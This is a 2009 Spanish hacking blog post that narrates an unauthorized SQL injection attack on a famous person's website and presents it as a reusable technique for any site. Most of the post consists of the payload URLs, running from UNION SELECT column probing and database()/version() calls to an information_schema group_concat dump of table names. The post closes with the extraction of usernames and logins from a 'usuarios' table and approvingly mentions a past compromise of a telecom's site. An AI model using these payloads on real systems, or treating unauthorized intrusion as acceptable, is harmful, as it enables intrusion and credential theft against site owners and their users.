. Con la tecnología de Blogger.

martes, 14 de abril de 2009

caso injection sql

bueno este es un caso que aveces nos pasa y no nos damos cuenta.
dejamos la web de lado y buscamos otra forma de entrar o directamente buscamos otra web ._.

hablando con un amigo x msn le dije " vamos a juankear algo" bueno me dijo asi qe fuimos a buscar una web de una persona famosa ( no voy a decir quien es xD )
mirando la web , por que todabia no haciamos un reverse dsn ni nada por el estilo
nos pusimos a ver los modulos en php.. a ver si encontrabamos algo
y encontramos Tongue

foto.php?id=

donde vimos este error

http://web.com/foto.php?id='

no daba el error



asi que procedimos a hacer una union select

http://web.com/foto.php?id=-9+union+select+0--

nos devolvio



hay dije... mmmm no hay error pero no printea nada
veamos con 2
probando:

http://web.com/foto.php?id=-9+union+select+0,1--

y nos devolvio:



hay fue cuando dijimos
WTF .______. ?

asi que pense bien y dije.. el 0 no dio error..
asi que volvi a

http://web.com/foto.php?id=-9+union+select+0--
sabiendo que la web solamente iba a cargar una foto..
me iamgine en el codigo fuente algo como


asi que mire el codigo fuente y me aparecio asi:


donde si miramos bien no es como dije

asi que viendo que el 0 aparecio en el codigo fuente.. se me dio por poner en ves del 0 en la URL
poner
database()

lo que para nuestra suerte nos devolvio



asi que era como pense en un momento
printeaba en el codigo fuente de la web pero no en el index

me fui a ver la version
http://web.com/foto.php?id=-9+union+select+version()--



viendo que era 5.* sabia que iba a existir information_schema
asi que concatie todas las tablas en una sola consulta

http://web.com/foto.php?id=-9+union+select+group_concat(table_name)+from+information_schema.tables--

lo que nos devolvio



donde para nuestra suerte existia la tabla "usuarios"
despues miramos
sacamos el nombre de usuario y login y fue

aveces pasa esto de que printea en el codigo fuente y no en el index
siempre es bueno tener en cuenta estas cosas

en la pagina de movistar de argentina ocurria esto cuando la ownearon el año pasado
x eso no importa que web sea
siempre es bueno saberlo

al pelotudo que ya lo sabia y va a criticar
que me cuhpe un huevo x)

saludos
pd : todito mio u.u

Publicado por Darioxhcx en 14:18

Etiquetas: ,

0 comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)